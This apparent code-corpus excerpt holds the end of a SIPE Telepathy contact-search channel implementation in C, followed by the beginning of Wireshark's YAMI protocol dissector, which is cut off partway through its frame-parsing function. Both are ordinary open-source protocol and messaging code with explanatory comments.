	/* common channel properties first ... */
	parent->fill_immutable_properties(channel, properties);

	/* ... then the search-channel addition */
	tp_dbus_properties_mixin_fill_properties_hash(G_OBJECT(channel),
						      properties,
						      TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH, "AvailableSearchKeys",
						      NULL);
}
/* Build a unique D-Bus object path suffix from the channel address. */
static gchar *get_object_path_suffix(TpBaseChannel *base)
{
	gchar *suffix = g_strdup_printf("SearchChannel_%p", base);
	return(suffix);
}
/* No extra D-Bus interfaces beyond what TpBaseChannel reports. */
static GPtrArray *get_interfaces(TpBaseChannel *self)
{
	return(TP_BASE_CHANNEL_CLASS(sipe_search_channel_parent_class)->get_interfaces(self));
}
/* GObject::constructed: chain up, then mark the result table as not
 * yet allocated (it is created lazily when a search starts). */
static void sipe_search_channel_constructed(GObject *object)
{
	void (*chain_up)(GObject *) = G_OBJECT_CLASS(sipe_search_channel_parent_class)->constructed;
	SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(object);

	if (chain_up)
		chain_up(object);

	self->results = NULL;
}
/* GObject::finalize: drop the result table (if a search ever ran),
 * then chain up. */
static void sipe_search_channel_finalize(GObject *object)
{
	SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(object);

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::finalize");

	if (self->results != NULL)
		g_hash_table_unref(self->results);

	G_OBJECT_CLASS(sipe_search_channel_parent_class)->finalize(object);
}
/*
* Search Channel class - type implementation
*/
/*
 * Class initializer: wires the GObject vtable, configures the
 * TpBaseChannel behaviour and registers the D-Bus property mixin.
 */
static void sipe_search_channel_class_init(SipeSearchChannelClass *klass)
{
	/* maps the D-Bus property name to the GObject property that
	 * backs it (read via get_property() above) */
	static TpDBusPropertiesMixinPropImpl props[] = {
		{
			.name        = "AvailableSearchKeys",
			.getter_data = "available-search-keys",
			.setter_data = NULL
		},
		{
			.name = NULL
		}
	};
	GObjectClass *object_class = G_OBJECT_CLASS(klass);
	TpBaseChannelClass *base_class = TP_BASE_CHANNEL_CLASS(klass);
	GParamSpec *ps;

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::class_init");

	/* GObject lifecycle + property hooks */
	object_class->constructed  = sipe_search_channel_constructed;
	object_class->finalize     = sipe_search_channel_finalize;
	object_class->get_property = get_property;

	/* TpBaseChannel configuration: an anonymous (no target handle)
	 * ContactSearch channel */
	base_class->channel_type             = TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH;
	base_class->target_handle_type       = TP_HANDLE_TYPE_NONE;
	base_class->fill_immutable_properties = fill_immutable_properties;
	base_class->get_object_path_suffix   = get_object_path_suffix;
	base_class->interfaces               = NULL;
	base_class->get_interfaces           = get_interfaces;
	base_class->close                    = tp_base_channel_destroyed;

	/* read-only "available-search-keys" (string list) */
	ps = g_param_spec_boxed("available-search-keys",
				"Available search keys",
				"The set of search keys supported by this channel",
				G_TYPE_STRV,
				G_PARAM_READABLE | G_PARAM_STATIC_STRINGS);
	g_object_class_install_property(object_class,
					CHANNEL_PROP_SEARCH_KEYS,
					ps);

	tp_dbus_properties_mixin_implement_interface(object_class,
						     TP_IFACE_QUARK_CHANNEL_TYPE_CONTACT_SEARCH,
						     tp_dbus_properties_mixin_getter_gobject_properties,
						     NULL,
						     props);
}
/* Instance initializer: all setup happens in constructed() and
 * search_channel_new(). */
static void sipe_search_channel_init(SIPE_UNUSED_PARAMETER SipeSearchChannel *self)
{
	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::init");
}
/*
* Search Channel class - interface implementation
*
* Contact search
*/
/* Emit SearchStateChanged (with an optional debug message in the
 * details dictionary) and record the new state on the channel. */
static void search_channel_state(SipeSearchChannel *self,
				 TpChannelContactSearchState new_state,
				 const gchar *msg)
{
	GHashTable *details = tp_asv_new(NULL, NULL);

	if (msg)
		tp_asv_set_string(details, "debug-message", msg);

	tp_svc_channel_type_contact_search_emit_search_state_changed(self,
								     new_state,
								     msg ? msg : "",
								     details);
	self->state = new_state;

	g_hash_table_unref(details);
}
/*
 * ContactSearch.Search() D-Bus method implementation.
 *
 * Maps the requested search terms onto the fields understood by the
 * SIPE core and kicks off the search. Only valid while the channel
 * is still in the "not started" state, i.e. one search per channel.
 */
static void search_channel_search(TpSvcChannelTypeContactSearch *channel,
				  GHashTable *terms,
				  DBusGMethodInvocation *context)
{
	SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(channel);

	SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::search");

	if (self->state == TP_CHANNEL_CONTACT_SEARCH_STATE_NOT_STARTED) {
		/* each lookup returns NULL when the term wasn't supplied */
		const gchar *first = g_hash_table_lookup(terms,
							 SIPE_TELEPATHY_SEARCH_KEY_FIRST);
		const gchar *last = g_hash_table_lookup(terms,
							SIPE_TELEPATHY_SEARCH_KEY_LAST);
		const gchar *email = g_hash_table_lookup(terms,
							 SIPE_TELEPATHY_SEARCH_KEY_EMAIL);
		const gchar *company = g_hash_table_lookup(terms,
							   SIPE_TELEPATHY_SEARCH_KEY_COMPANY);
		const gchar *country = g_hash_table_lookup(terms,
							   SIPE_TELEPATHY_SEARCH_KEY_COUNTRY);
		struct sipe_backend_private *telepathy_private = sipe_telepathy_connection_private(self->connection);
		/* non-NULL only when one of the fallback terms was split */
		gchar **split = NULL;

		/* did the requester honor our "AvailableSearchKeys"? */
		if (!(first || last || email || company || country)) {
			const gchar *alternative = g_hash_table_lookup(terms,
								       SIPE_TELEPATHY_SEARCH_KEY_FULLNAME);

			/* No. Did he give a full name instead? */
			if (alternative) {
				SIPE_DEBUG_INFO("SipeSearchChannel::search: full name given: '%s'",
						alternative);

				/* assume:
				 *  - one word  -> first name
				 *  - two words -> first & last name
				 */
				split = g_strsplit(alternative, " ", 3);
				if (split[0]) {
					first = split[0];
					if (split[1])
						last = split[1];
				}

			/* No. Did he give a "on big search box" instead? */
			} else if ((alternative = g_hash_table_lookup(terms,
								      SIPE_TELEPATHY_SEARCH_KEY_BLOB))
				   != NULL) {
				SIPE_DEBUG_INFO("SipeSearchChannel::search: one big search box given: '%s'",
						alternative);

				/* assume:
				 *  - one word with '@' -> email
				 *  - one word          -> first name
				 *  - two words         -> first & last name
				 */
				split = g_strsplit(alternative, " ", 3);
				if (split[0]) {
					if (strchr(split[0], '@')) {
						email = split[0];
					} else {
						first = split[0];
						if (split[1])
							last = split[1];
					}
				}

			} else
				SIPE_DEBUG_ERROR_NOFORMAT("SipeSearchChannel::search: no valid terms found");
		}

		/* hand the (possibly derived) terms to the SIPE core;
		 * results arrive via the sipe_backend_search_*() hooks */
		sipe_core_buddy_search(telepathy_private->public,
				       (struct sipe_backend_search_token *) self,
				       first, last, email, NULL, company, country);

		g_strfreev(split);

		/* only switch to "in progress" if the above didn't fail */
		if (self->state == TP_CHANNEL_CONTACT_SEARCH_STATE_NOT_STARTED)
			search_channel_state(self,
					     TP_CHANNEL_CONTACT_SEARCH_STATE_IN_PROGRESS,
					     NULL);

		tp_svc_channel_type_contact_search_return_from_search(context);

	} else {
		GError *error = g_error_new(TP_ERROR, TP_ERROR_NOT_AVAILABLE,
					    "invalid search state");
		dbus_g_method_return_error(context, error);
		g_error_free(error);
	}
}
/* Fill in the ContactSearch service vtable; only Search() is
 * implemented - we don't support stopping a search. */
static void contact_search_iface_init(gpointer g_iface,
				      SIPE_UNUSED_PARAMETER gpointer iface_data)
{
	TpSvcChannelTypeContactSearchClass *klass = g_iface;

	tp_svc_channel_type_contact_search_implement_search(klass,
							    search_channel_search);
}
/* create new search channel object */
/* create new search channel object */
static GObject *search_channel_new(GObject *connection)
{
	SipeSearchChannel *channel;

	/* property "connection" required by TpBaseChannel */
	channel = g_object_new(SIPE_TYPE_SEARCH_CHANNEL,
			       "connection", connection,
			       NULL);
	channel->connection = g_object_ref(connection);
	channel->state = TP_CHANNEL_CONTACT_SEARCH_STATE_NOT_STARTED;

	/* publish the channel's object path on the bus */
	tp_base_channel_register(TP_BASE_CHANNEL(channel));

	return(G_OBJECT(channel));
}
/*
* Backend adaptor functions
*/
/* Backend hook: the core could not execute the search. */
void sipe_backend_search_failed(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
				struct sipe_backend_search_token *token,
				const gchar *msg)
{
	SipeSearchChannel *channel = SIPE_SEARCH_CHANNEL(token);

	SIPE_DEBUG_INFO("sipe_backend_search_failed: %s", msg);

	search_channel_state(channel,
			     TP_CHANNEL_CONTACT_SEARCH_STATE_FAILED,
			     msg);
}
/* GDestroyNotify for the per-contact Contact_Info_Field lists stored
 * as values in the results table */
static void free_info(GPtrArray *info)
{
	g_boxed_free(TP_ARRAY_TYPE_CONTACT_INFO_FIELD_LIST, info);
}
/* Backend hook: a search produced results; prepare the container the
 * core will fill via sipe_backend_search_results_add(). */
struct sipe_backend_search_results *sipe_backend_search_results_start(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
								      struct sipe_backend_search_token *token)
{
	SipeSearchChannel *channel = SIPE_SEARCH_CHANNEL(token);

	/* maps contact URI -> GPtrArray of Contact_Info_Fields */
	channel->results = g_hash_table_new_full(g_str_hash, g_str_equal,
						 g_free,
						 (GDestroyNotify) free_info);

	return((struct sipe_backend_search_results *) channel);
}
/* adds: the Contact_Info_Field (field_name, [], values) */
/* adds: the Contact_Info_Field (field_name, [], values) */
static void add_search_result(GPtrArray *info,
			      const gchar *field_name,
			      const gchar *field_value)
{
	if (field_value) {
		/* fixed: was "const gchar **empty = { NULL };", which
		 * declares a NULL *pointer*, not an empty string list.
		 * A NULL G_TYPE_STRV is not a valid empty "as" for the
		 * D-Bus marshaller; a one-element array holding only
		 * the NULL terminator is. */
		static const gchar *empty[] = { NULL };
		GValueArray *field = g_value_array_new(3);
		const gchar *components[] = { field_value, NULL };
		GValue *value;

		SIPE_DEBUG_INFO("add_search_result: %s = '%s'",
				field_name, field_value);

		/* field[0]: field name (s) */
		g_value_array_append(field, NULL);
		value = g_value_array_get_nth(field, 0);
		g_value_init(value, G_TYPE_STRING);
		g_value_set_static_string(value, field_name);

		/* field[1]: field parameters (as) - always empty */
		g_value_array_append(field, NULL);
		value = g_value_array_get_nth(field, 1);
		g_value_init(value, G_TYPE_STRV);
		g_value_set_static_boxed(value, empty);

		/* field[2]: field values (as) - exactly one entry */
		g_value_array_append(field, NULL);
		value = g_value_array_get_nth(field, 2);
		g_value_init(value, G_TYPE_STRV);
		g_value_set_boxed(value, components);

		g_ptr_array_add(info, field);
	}
}
/* Backend hook: record one search hit. NULL field values are simply
 * skipped by add_search_result(). */
void sipe_backend_search_results_add(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
				     struct sipe_backend_search_results *results,
				     const gchar *uri,
				     const gchar *name,
				     const gchar *company,
				     const gchar *country,
				     const gchar *email)
{
	SipeSearchChannel *channel = SIPE_SEARCH_CHANNEL(results);
	GPtrArray *fields = g_ptr_array_new();

	add_search_result(fields, SIPE_TELEPATHY_SEARCH_KEY_FULLNAME, name);
	add_search_result(fields, SIPE_TELEPATHY_SEARCH_KEY_COMPANY,  company);
	add_search_result(fields, SIPE_TELEPATHY_SEARCH_KEY_COUNTRY,  country);
	add_search_result(fields, SIPE_TELEPATHY_SEARCH_KEY_EMAIL,    email);

	g_hash_table_insert(channel->results, g_strdup(uri), fields);
}
/* Backend hook: the search is done - deliver everything collected so
 * far in one SearchResultReceived signal and mark the channel as
 * completed. */
void sipe_backend_search_results_finalize(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
					  struct sipe_backend_search_results *results,
					  SIPE_UNUSED_PARAMETER const gchar *description,
					  SIPE_UNUSED_PARAMETER gboolean more)
{
	SipeSearchChannel *channel = SIPE_SEARCH_CHANNEL(results);

	tp_svc_channel_type_contact_search_emit_search_result_received(channel,
								       channel->results);
	search_channel_state(channel,
			     TP_CHANNEL_CONTACT_SEARCH_STATE_COMPLETED,
			     NULL);
}
/*
Local Variables:
mode: c
c-file-style: "bsd"
indent-tabs-mode: t
tab-width: 8
End:
*/
| gpl-2.0 |
hashbrowncipher/wireshark | epan/dissectors/packet-yami.c | 2 | 19179 | /* packet-yami.c
* Routines for YAMI dissection
* Copyright 2010, Pawel Korbut
* Copyright 2012, Jakub Zawadzki <darkjames-ws@darkjames.pl>
*
* $Id$
*
* Protocol documentation available at http://www.inspirel.com/yami4/book/B-2.html
*
* Wireshark - Network traffic analyzer
* By Gerald Combs <gerald@wireshark.org>
* Copyright 1998 Gerald Combs
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#define NEW_PROTO_TREE_API
#include "config.h"
#include <epan/packet.h>
#include <epan/prefs.h>
#include <epan/strutil.h>
#include <epan/to_str.h>
#include <epan/dissectors/packet-tcp.h>
void proto_reg_handoff_yami(void);
void proto_register_yami(void);

/* preference: reassemble YAMI messages that span TCP segments */
static gboolean yami_desegment = TRUE;
/* preferences: TCP/UDP ports to dissect (0 = disabled until set) */
static guint global_yami_config_tcp_port = 0;
static guint global_yami_config_udp_port = 0;
/* handle registered in proto_register_yami(), (re-)bound to ports in
 * proto_reg_handoff_yami() */
static dissector_handle_t yami_handle;
/* on-the-wire parameter type tags of the YAMI4 serialization format */
#define YAMI_TYPE_BOOLEAN 1
#define YAMI_TYPE_INTEGER 2
#define YAMI_TYPE_LONGLONG 3
#define YAMI_TYPE_DOUBLE 4
#define YAMI_TYPE_STRING 5
#define YAMI_TYPE_BINARY 6
#define YAMI_TYPE_BOOLEAN_ARRAY 7
#define YAMI_TYPE_INTEGER_ARRAY 8
#define YAMI_TYPE_LONGLONG_ARRAY 9
#define YAMI_TYPE_DOUBLE_ARRAY 10
#define YAMI_TYPE_STRING_ARRAY 11
#define YAMI_TYPE_BINARY_ARRAY 12
#define YAMI_TYPE_NESTED 13

/* display names for the type tags above */
static const value_string yami_param_type_vals[] = {
	{ YAMI_TYPE_BOOLEAN,        "boolean" },
	{ YAMI_TYPE_INTEGER,        "integer" },
	{ YAMI_TYPE_LONGLONG,       "long long" },
	{ YAMI_TYPE_DOUBLE,         "double" },
	{ YAMI_TYPE_STRING,         "string" },
	{ YAMI_TYPE_BINARY,         "binary" },
	{ YAMI_TYPE_BOOLEAN_ARRAY,  "boolean array" },
	{ YAMI_TYPE_INTEGER_ARRAY,  "integer array" },
	{ YAMI_TYPE_LONGLONG_ARRAY, "long long array" },
	{ YAMI_TYPE_DOUBLE_ARRAY,   "double array" },
	{ YAMI_TYPE_STRING_ARRAY,   "string array" },
	{ YAMI_TYPE_BINARY_ARRAY,   "binary array" },
	{ YAMI_TYPE_NESTED,         "nested parameters" },
	{ 0, NULL }
};
/* NEW_PROTO_TREE_API style: fields are header_field_info structs
 * registered via proto_register_fields() below */
static header_field_info *hfi_yami = NULL;

#define YAMI_HFI_INIT HFI_INIT(proto_yami)

/* Header */
static header_field_info hfi_yami_message_id YAMI_HFI_INIT =
	{ "Message ID", "yami.message_id", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_frame_number YAMI_HFI_INIT =
	{ "Frame Number", "yami.frame_number", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_message_header_size YAMI_HFI_INIT =
	{ "Message Header Size", "yami.message_header_size", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_frame_payload_size YAMI_HFI_INIT =
	{ "Frame Payload Size", "yami.frame_payload_size", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_message_hdr YAMI_HFI_INIT =
	{ "Header message", "yami.msg_hdr", FT_NONE, BASE_NONE, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_message_data YAMI_HFI_INIT =
	{ "Data message", "yami.msg_data", FT_NONE, BASE_NONE, NULL, 0x00, NULL, HFILL };

/* Parameter */
static header_field_info hfi_yami_param YAMI_HFI_INIT =
	{ "Parameter", "yami.param", FT_NONE, BASE_NONE, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_param_name YAMI_HFI_INIT =
	{ "Name", "yami.param.name", FT_STRING, BASE_NONE, NULL, 0x00, "Parameter name", HFILL };

static header_field_info hfi_yami_param_type YAMI_HFI_INIT =
	{ "Type", "yami.param.type", FT_INT32, BASE_DEC, VALS(yami_param_type_vals), 0x00, "Parameter type", HFILL };

/* one "Value" field per wire type; only the matching one is added */
static header_field_info hfi_yami_param_value_bool YAMI_HFI_INIT =
	{ "Value", "yami.param.value_bool", FT_BOOLEAN, BASE_NONE, NULL, 0x00, "Parameter value (bool)", HFILL };

static header_field_info hfi_yami_param_value_int YAMI_HFI_INIT =
	{ "Value", "yami.param.value_int", FT_INT32, BASE_DEC, NULL, 0x00, "Parameter value (int)", HFILL };

static header_field_info hfi_yami_param_value_long YAMI_HFI_INIT =
	{ "Value", "yami.param.value_long", FT_INT64, BASE_DEC, NULL, 0x00, "Parameter value (long)", HFILL };

static header_field_info hfi_yami_param_value_double YAMI_HFI_INIT =
	{ "Value", "yami.param.value_double", FT_DOUBLE, BASE_NONE, NULL, 0x00, "Parameter value (double)", HFILL };

static header_field_info hfi_yami_param_value_str YAMI_HFI_INIT =
	{ "Value", "yami.param.value_str", FT_STRING, BASE_NONE, NULL, 0x00, "Parameter value (string)", HFILL };

static header_field_info hfi_yami_param_value_bin YAMI_HFI_INIT =
	{ "Value", "yami.param.value_bin", FT_BYTES, BASE_NONE, NULL, 0x00, "Parameter value (binary)", HFILL };

static header_field_info hfi_yami_params_count YAMI_HFI_INIT =
	{ "Parameters count", "yami.params_count", FT_UINT32, BASE_DEC, NULL, 0x00, NULL, HFILL };

static header_field_info hfi_yami_items_count YAMI_HFI_INIT =
	{ "Items count", "yami.items_count", FT_UINT32, BASE_DEC, NULL, 0x00, NULL, HFILL };

/* protocol subtree handles */
static int ett_yami = -1;
static int ett_yami_msg_hdr = -1;
static int ett_yami_msg_data = -1;
static int ett_yami_param = -1;
/*
 * Dissect one serialized YAMI parameter starting at <offset>.
 *
 * Wire layout: 32-bit LE name length, ASCII name (padded to a 4-byte
 * boundary), 32-bit LE type tag, then a type-specific payload.
 * Nested parameter lists are handled recursively.
 *
 * Returns the offset just past the parameter, or -1 on an unknown
 * type tag (callers must then abort dissection of this message).
 */
static int
dissect_yami_parameter(tvbuff_t *tvb, proto_tree *tree, int offset, proto_item *par_ti)
{
	const int orig_offset = offset;
	proto_tree *yami_param;
	proto_item *ti;
	char *name;
	int name_offset;
	guint32 name_len;
	guint32 type;

	ti = proto_tree_add_item(tree, &hfi_yami_param, tvb, offset, 0, ENC_NA);
	yami_param = proto_item_add_subtree(ti, ett_yami_param);

	/* parameter name: length-prefixed, padded to a multiple of 4 */
	name_offset = offset;
	name_len = tvb_get_letohl(tvb, offset);
	offset += 4;
	name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, name_len, ENC_ASCII | ENC_NA);
	proto_item_append_text(ti, ": %s", name);
	proto_item_append_text(par_ti, "%s, ", name);
	offset += (name_len + 3) & ~3;	/* round up to 4-byte boundary */
	proto_tree_add_string(yami_param, &hfi_yami_param_name, tvb, name_offset, offset - name_offset, name);

	type = tvb_get_letohl(tvb, offset);
	proto_tree_add_item(yami_param, &hfi_yami_param_type, tvb, offset, 4, ENC_LITTLE_ENDIAN);
	offset += 4;

	switch (type) {
		case YAMI_TYPE_BOOLEAN:
		{
			/* stored as a full 32-bit word; non-zero = true */
			guint32 val = tvb_get_letohl(tvb, offset);

			proto_item_append_text(ti, ", Type: boolean, Value: %s", val ? "True" : "False");
			proto_tree_add_item(yami_param, &hfi_yami_param_value_bool, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;
			break;
		}

		case YAMI_TYPE_INTEGER:
		{
			gint32 val = tvb_get_letohl(tvb, offset);

			proto_item_append_text(ti, ", Type: integer, Value: %d", val);
			proto_tree_add_item(yami_param, &hfi_yami_param_value_int, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;
			break;
		}

		case YAMI_TYPE_LONGLONG:
		{
			gint64 val = tvb_get_letoh64(tvb, offset);

			proto_item_append_text(ti, ", Type: long, Value: %" G_GINT64_MODIFIER "d", val);
			proto_tree_add_item(yami_param, &hfi_yami_param_value_long, tvb, offset, 8, ENC_LITTLE_ENDIAN);
			offset += 8;
			break;
		}

		case YAMI_TYPE_DOUBLE:
		{
			gdouble val = tvb_get_letohieee_double(tvb, offset);

			proto_item_append_text(ti, ", Type: double, Value: %g", val);
			proto_tree_add_item(yami_param, &hfi_yami_param_value_double, tvb, offset, 8, ENC_LITTLE_ENDIAN);
			offset += 8;
			break;
		}

		case YAMI_TYPE_STRING:
		{
			/* length-prefixed, padded like the parameter name */
			const int val_offset = offset;
			guint32 val_len;
			char *val;

			val_len = tvb_get_letohl(tvb, offset);
			offset += 4;

			val = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, val_len, ENC_ASCII | ENC_NA);
			proto_item_append_text(ti, ", Type: string, Value: \"%s\"", val);
			offset += (val_len + 3) & ~3;
			proto_tree_add_string(yami_param, &hfi_yami_param_value_str, tvb, val_offset, offset - val_offset, val);
			break;
		}

		case YAMI_TYPE_BINARY:
		{
			/* length-prefixed raw bytes, padded to 4 bytes */
			const int val_offset = offset;
			guint32 val_len;
			const guint8 *val;
			char *repr;

			val_len = tvb_get_letohl(tvb, offset);
			offset += 4;

			val = tvb_get_ptr(tvb, offset, val_len);
			repr = bytes_to_ep_str(val, val_len);

			proto_item_append_text(ti, ", Type: binary, Value: %s", repr);
			offset += (val_len + 3) & ~3;
			proto_tree_add_bytes_format_value(yami_param, hfi_yami_param_value_bin.id, tvb, val_offset, offset - val_offset, val, "%s", repr);
			break;
		}

		case YAMI_TYPE_BOOLEAN_ARRAY:
		{
			/* item count, then booleans packed 32 per LE word */
			guint32 count;
			guint i;
			int j;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: boolean[], %u items: {", count);

			/* full 32-bit words first */
			for (i = 0; i < count/32; i++) {
				guint32 val = tvb_get_letohl(tvb, offset);

				for (j = 0; j < 32; j++) {
					int r = !!(val & (1 << j));

					proto_item_append_text(ti, "%s, ", r ? "T" : "F");
					proto_tree_add_boolean(yami_param, &hfi_yami_param_value_bool, tvb, offset+(j/8), 1, r);
				}
				offset += 4;
			}

			/* then the remaining bits of the last partial word */
			if (count % 32) {
				guint32 val = tvb_get_letohl(tvb, offset);
				int tmp = count % 32;

				for (j = 0; j < tmp; j++) {
					int r = !!(val & (1 << j));

					proto_item_append_text(ti, "%s, ", r ? "T" : "F");
					proto_tree_add_boolean(yami_param, &hfi_yami_param_value_bool, tvb, offset+(j/8), 1, r);
				}
				offset += 4;
			}
			proto_item_append_text(ti, "}");
			break;
		}

		case YAMI_TYPE_INTEGER_ARRAY:
		{
			/* item count, then 32-bit LE integers */
			guint32 count;
			guint i;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: integer[], %u items: {", count);

			for (i = 0; i < count; i++) {
				gint32 val = tvb_get_letohl(tvb, offset);

				proto_item_append_text(ti, "%d, ", val);
				proto_tree_add_item(yami_param, &hfi_yami_param_value_int, tvb, offset, 4, ENC_LITTLE_ENDIAN);
				offset += 4;
			}
			proto_item_append_text(ti, "}");
			break;
		}

		case YAMI_TYPE_LONGLONG_ARRAY:
		{
			/* item count, then 64-bit LE integers */
			guint32 count;
			guint i;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: long long[], %u items: {", count);

			for (i = 0; i < count; i++) {
				gint64 val = tvb_get_letoh64(tvb, offset);

				proto_item_append_text(ti, "%" G_GINT64_MODIFIER "d, ", val);
				proto_tree_add_item(yami_param, &hfi_yami_param_value_long, tvb, offset, 8, ENC_LITTLE_ENDIAN);
				offset += 8;
			}
			proto_item_append_text(ti, "}");
			break;
		}

		case YAMI_TYPE_DOUBLE_ARRAY:
		{
			/* item count, then 64-bit LE IEEE doubles */
			guint32 count;
			guint i;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: double[], %u items: {", count);

			for (i = 0; i < count; i++) {
				gdouble val = tvb_get_letohieee_double(tvb, offset);

				proto_item_append_text(ti, "%g, ", val);
				proto_tree_add_item(yami_param, &hfi_yami_param_value_double, tvb, offset, 8, ENC_LITTLE_ENDIAN);
				offset += 8;
			}
			proto_item_append_text(ti, "}");
			break;
		}

		case YAMI_TYPE_STRING_ARRAY:
		{
			/* item count, then length-prefixed padded strings */
			guint32 count;
			guint i;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: string[], %u items: {", count);

			for (i = 0; i < count; i++) {
				const int val_offset = offset;
				guint32 val_len;
				char *val;

				val_len = tvb_get_letohl(tvb, offset);
				offset += 4;

				val = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, val_len, ENC_ASCII | ENC_NA);
				proto_item_append_text(ti, "\"%s\", ", val);
				proto_tree_add_string(yami_param, &hfi_yami_param_value_str, tvb, val_offset, offset - val_offset, val);
				offset += (val_len + 3) & ~3;
			}
			proto_item_append_text(ti, "}");
			break;
		}

		case YAMI_TYPE_BINARY_ARRAY:
		{
			/* item count, then length-prefixed padded blobs */
			guint32 count;
			guint i;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: binary[], %u items: {", count);

			for (i = 0; i < count; i++) {
				const int val_offset = offset;
				guint32 val_len;
				const guint8 *val;
				char *repr;

				val_len = tvb_get_letohl(tvb, offset);
				offset += 4;

				val = tvb_get_ptr(tvb, offset, val_len);
				repr = bytes_to_ep_str(val, val_len);

				proto_item_append_text(ti, "%s, ", repr);
				offset += (val_len + 3) & ~3;
				proto_tree_add_bytes_format_value(yami_param, hfi_yami_param_value_bin.id, tvb, val_offset, offset - val_offset, val, "%s", repr);
			}
			proto_item_append_text(ti, "}");
			break;
		}

		case YAMI_TYPE_NESTED:
		{
			/* parameter count, then that many recursive params */
			guint32 count;
			guint i;

			count = tvb_get_letohl(tvb, offset);
			proto_tree_add_item(yami_param, &hfi_yami_params_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
			offset += 4;

			proto_item_append_text(ti, ", Type: nested, %u parameters: ", count);

			for (i = 0; i < count; i++) {
				offset = dissect_yami_parameter(tvb, yami_param, offset, ti);
				/* smth went wrong */
				if (offset == -1)
					return -1;
			}
			break;
		}

		default:
			proto_item_append_text(ti, ", Type: unknown (%d)!", type);
			return -1;
	}

	proto_item_set_len(ti, offset - orig_offset);
	return offset;
}
/*
 * Dissect a parameter block (message header when data == FALSE, the
 * message body otherwise): a 32-bit LE parameter count followed by
 * that many serialized parameters. Returns the offset past the
 * block, or -1 when a parameter could not be dissected.
 */
static int
dissect_yami_data(tvbuff_t *tvb, gboolean data, proto_tree *tree, int offset)
{
	const int start = offset;
	proto_item *item;
	proto_tree *subtree;
	guint32 nparams;
	guint idx;

	item = proto_tree_add_item(tree, data ? &hfi_yami_message_data : &hfi_yami_message_hdr, tvb, offset, 0, ENC_NA);
	subtree = proto_item_add_subtree(item, data ? ett_yami_msg_data : ett_yami_msg_hdr);

	nparams = tvb_get_letohl(tvb, offset);
	proto_tree_add_item(subtree, &hfi_yami_params_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
	offset += 4;

	proto_item_append_text(item, ", %u parameters: ", nparams);

	for (idx = 0; idx < nparams; idx++) {
		offset = dissect_yami_parameter(tvb, subtree, offset, item);
		/* smth went wrong */
		if (offset == -1)
			return -1;
	}

	proto_item_set_len(item, offset - start);
	return offset;
}
/*
 * Dissect one reassembled YAMI frame: a 16-byte header of four 32-bit
 * LE words (message id, frame number, header size, payload size),
 * followed by the payload. The header/body parameter blocks are only
 * present in the first or only frame of a message.
 */
static int
dissect_yami_pdu(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void* data _U_)
{
	proto_tree *yami_tree;
	proto_item *ti;
	gint frame_number;
	gint message_header_size;
	gint frame_payload_size;
	gint frame_size;
	int offset;

	col_set_str(pinfo->cinfo, COL_PROTOCOL, "YAMI");
	col_clear(pinfo->cinfo, COL_INFO);

	ti = proto_tree_add_item(tree, hfi_yami, tvb, 0, -1, ENC_NA);
	yami_tree = proto_item_add_subtree(ti, ett_yami);

	offset = 0;
	proto_tree_add_item(yami_tree, &hfi_yami_message_id, tvb, offset, 4, ENC_LITTLE_ENDIAN);
	offset += 4;

	/* a negative frame number marks the last frame of a message */
	frame_number = tvb_get_letohl(tvb, offset);
